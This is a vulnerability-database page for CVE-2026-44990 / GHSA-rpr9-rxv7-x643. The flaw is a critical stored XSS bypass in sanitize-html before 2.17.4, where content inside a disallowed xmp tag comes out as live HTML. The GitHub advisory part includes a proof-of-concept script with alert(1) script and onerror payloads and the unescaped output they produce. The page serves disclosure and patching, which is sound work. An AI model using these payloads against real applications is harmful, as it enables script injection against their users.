Vulnerability-Lookup

CVE-2026-44990 (GCVE-0-2026-44990)

Vulnerability from cvelistv5 – Published: 2026-06-12 20:39 – Updated: 2026-06-12 20:39

Title

Apostrophe has default XSS via `xmp` raw-text passthrough in `sanitize-html`

Summary

ApostropheCMS is an open-source Node.js content management system, and sanitize-html provides a simple HTML sanitizer with a clear API. Under the default configuration, versions of `sanitize-html` prior to 2.17.4 can turn attacker-controlled content inside a disallowed `xmp` element into live HTML or JavaScript. This is a sanitizer bypass in the default `disallowedTagsMode: 'discard'` path and can lead to stored XSS in applications that render sanitized output back to users. Version 2.17.4 patches the issue.

Severity

9.3 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/apostrophecms/apostrophe/secur…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
apostrophecms	sanitize-html	Affected: < 2.17.4

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "sanitize-html",
          "vendor": "apostrophecms",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.17.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "ApostropheCMS is an open-source Node.js content management system, and sanitize-html provides a simple HTML sanitizer with a clear API. Under the default configuration, versions of `sanitize-html` prior to 2.17.4 can turn attacker-controlled content inside a disallowed `xmp` element into live HTML or JavaScript. This is a sanitizer bypass in the default `disallowedTagsMode: \u0027discard\u0027` path and can lead to stored XSS in applications that render sanitized output back to users. Version 2.17.4 patches the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 9.3,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-12T20:39:47.065Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-rpr9-rxv7-x643",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-rpr9-rxv7-x643"
        }
      ],
      "source": {
        "advisory": "GHSA-rpr9-rxv7-x643",
        "discovery": "UNKNOWN"
      },
      "title": "Apostrophe has default XSS via `xmp` raw-text passthrough in `sanitize-html`"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44990",
    "datePublished": "2026-06-12T20:39:47.065Z",
    "dateReserved": "2026-05-08T16:23:33.265Z",
    "dateUpdated": "2026-06-12T20:39:47.065Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-44990",
      "date": "2026-06-14",
      "epss": "0.00012",
      "percentile": "0.01698"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-44990\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-06-12T21:16:22.447\",\"lastModified\":\"2026-06-12T21:16:22.447\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"ApostropheCMS is an open-source Node.js content management system, and sanitize-html provides a simple HTML sanitizer with a clear API. Under the default configuration, versions of `sanitize-html` prior to 2.17.4 can turn attacker-controlled content inside a disallowed `xmp` element into live HTML or JavaScript. This is a sanitizer bypass in the default `disallowedTagsMode: \u0027discard\u0027` path and can lead to stored XSS in applications that render sanitized output back to users. Version 2.17.4 patches the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N\",\"baseScore\":9.3,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":5.8}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"references\":[{\"url\":\"https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-rpr9-rxv7-x643\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

FKIE_CVE-2026-44990

Vulnerability from fkie_nvd - Published: 2026-06-12 21:16 - Updated: 2026-06-12 21:16

Severity

9.3 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-rpr9-rxv7-x643

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "ApostropheCMS is an open-source Node.js content management system, and sanitize-html provides a simple HTML sanitizer with a clear API. Under the default configuration, versions of `sanitize-html` prior to 2.17.4 can turn attacker-controlled content inside a disallowed `xmp` element into live HTML or JavaScript. This is a sanitizer bypass in the default `disallowedTagsMode: \u0027discard\u0027` path and can lead to stored XSS in applications that render sanitized output back to users. Version 2.17.4 patches the issue."
    }
  ],
  "id": "CVE-2026-44990",
  "lastModified": "2026-06-12T21:16:22.447",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 9.3,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.8,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-06-12T21:16:22.447",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-rpr9-rxv7-x643"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-RPR9-RXV7-X643

Vulnerability from github – Published: 2026-05-14 18:26 – Updated: 2026-06-12 22:02

Summary

Apostrophe has default XSS via `xmp` raw-text passthrough in `sanitize-html`

Details

Summary

Under the default configuration, sanitize-html can turn attacker-controlled content inside a disallowed xmp element into live HTML or JavaScript. This is a sanitizer bypass in the default disallowedTagsMode: 'discard' path and can lead to stored XSS in applications that render sanitized output back to users.

Details

In sanitize-html@2.17.3, the default nonTextTags list includes only script, style, textarea, and option in index.js lines 138-142. That means disallowed xmp tags are not treated as "drop the entire contents" tags.

Later, in the ontext handler at index.js lines 569-577, the code special-cases textarea and xmp and appends their text content directly to the output without escaping:

} else if ((options.disallowedTagsMode === 'discard' || options.disallowedTagsMode === 'completelyDiscard') && (tag === 'textarea' || tag === 'xmp')) {
  result += text;
}

Because htmlparser2 treats xmp as a raw-text element, markup inside xmp is parsed as text on input but becomes live markup again once it is appended unescaped to the sanitized output.

This creates a default sanitizer bypass. For example, a disallowed <xmp> wrapper can be used to smuggle <script> or event-handler payloads through sanitization.

The README also appears to contradict the implementation. In the "Discarding the entire contents of a disallowed tag" section, the documented exception list names only style, script, textarea, and option, and does not mention xmp.

PoC

Tested locally against sanitize-html@2.17.3 on Node.js v25.2.1.

Install the package:

npm install sanitize-html

Run the following script:

const sanitizeHtml = require('sanitize-html');

console.log(sanitizeHtml('<xmp><script>alert(1)</script></xmp>'));
console.log(sanitizeHtml('<xmp><img src=x onerror=alert(1)></xmp>'));
console.log(sanitizeHtml('<xmp><svg><script>alert(1)</script></svg></xmp>'));

Observed output:

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg><script>alert(1)</script></svg>

Render any of the returned strings in a browser context that trusts sanitize-html output, for example:

const dirty = '<xmp><script>alert(1)</script></xmp>';
const clean = sanitizeHtml(dirty);

If clean is inserted into the DOM or stored and later rendered as trusted HTML, the attacker-controlled script executes.

Impact

This is a cross-site scripting vulnerability in the default sanitizer behavior. Any application that uses sanitize-html defaults and then renders the returned HTML as trusted output is impacted. A remote attacker who can submit HTML content can trigger execution of arbitrary JavaScript in another user's browser when that content is viewed.

Severity

9.3 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "sanitize-html"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.17.3"
            },
            {
              "fixed": "2.17.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "2.17.3"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44990"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T18:26:27Z",
    "nvd_published_at": "2026-06-12T21:16:22Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nUnder the default configuration, `sanitize-html` can turn attacker-controlled content inside a disallowed `xmp` element into live HTML or JavaScript. This is a sanitizer bypass in the default `disallowedTagsMode: \u0027discard\u0027` path and can lead to stored XSS in applications that render sanitized output back to users.\n\n### Details\nIn `sanitize-html@2.17.3`, the default `nonTextTags` list includes only `script`, `style`, `textarea`, and `option` in `index.js` lines 138-142. That means disallowed `xmp` tags are not treated as \"drop the entire contents\" tags.\n\nLater, in the `ontext` handler at `index.js` lines 569-577, the code special-cases `textarea` and `xmp` and appends their text content directly to the output without escaping:\n\n```js\n} else if ((options.disallowedTagsMode === \u0027discard\u0027 || options.disallowedTagsMode === \u0027completelyDiscard\u0027) \u0026\u0026 (tag === \u0027textarea\u0027 || tag === \u0027xmp\u0027)) {\n  result += text;\n}\n```\n\nBecause `htmlparser2` treats `xmp` as a raw-text element, markup inside `xmp` is parsed as text on input but becomes live markup again once it is appended unescaped to the sanitized output.\n\nThis creates a default sanitizer bypass. For example, a disallowed `\u003cxmp\u003e` wrapper can be used to smuggle `\u003cscript\u003e` or event-handler payloads through sanitization.\n\nThe README also appears to contradict the implementation. In the \"Discarding the entire contents of a disallowed tag\" section, the documented exception list names only `style`, `script`, `textarea`, and `option`, and does not mention `xmp`.\n\n### PoC\nTested locally against `sanitize-html@2.17.3` on Node.js `v25.2.1`.\n\n1. Install the package:\n\n```bash\nnpm install sanitize-html\n```\n\n2. Run the following script:\n\n```js\nconst sanitizeHtml = require(\u0027sanitize-html\u0027);\n\nconsole.log(sanitizeHtml(\u0027\u003cxmp\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003c/xmp\u003e\u0027));\nconsole.log(sanitizeHtml(\u0027\u003cxmp\u003e\u003cimg src=x onerror=alert(1)\u003e\u003c/xmp\u003e\u0027));\nconsole.log(sanitizeHtml(\u0027\u003cxmp\u003e\u003csvg\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003c/svg\u003e\u003c/xmp\u003e\u0027));\n```\n\n3. Observed output:\n\n```html\n\u003cscript\u003ealert(1)\u003c/script\u003e\n\u003cimg src=x onerror=alert(1)\u003e\n\u003csvg\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003c/svg\u003e\n```\n\n4. Render any of the returned strings in a browser context that trusts `sanitize-html` output, for example:\n\n```js\nconst dirty = \u0027\u003cxmp\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003c/xmp\u003e\u0027;\nconst clean = sanitizeHtml(dirty);\n```\n\nIf `clean` is inserted into the DOM or stored and later rendered as trusted HTML, the attacker-controlled script executes.\n\n### Impact\nThis is a cross-site scripting vulnerability in the default sanitizer behavior. Any application that uses `sanitize-html` defaults and then renders the returned HTML as trusted output is impacted. A remote attacker who can submit HTML content can trigger execution of arbitrary JavaScript in another user\u0027s browser when that content is viewed.",
  "id": "GHSA-rpr9-rxv7-x643",
  "modified": "2026-06-12T22:02:01Z",
  "published": "2026-05-14T18:26:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-rpr9-rxv7-x643"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44990"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apostrophecms/apostrophe/issues/5418"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apostrophecms/apostrophe/commit/8d4c882b4ed3a7ce802cd87f89f0c1cb7482b8c2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apostrophecms/apostrophe"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Apostrophe has default XSS via `xmp` raw-text passthrough in `sanitize-html`"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-44990 (GCVE-0-2026-44990)

FKIE_CVE-2026-44990

GHSA-RPR9-RXV7-X643

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature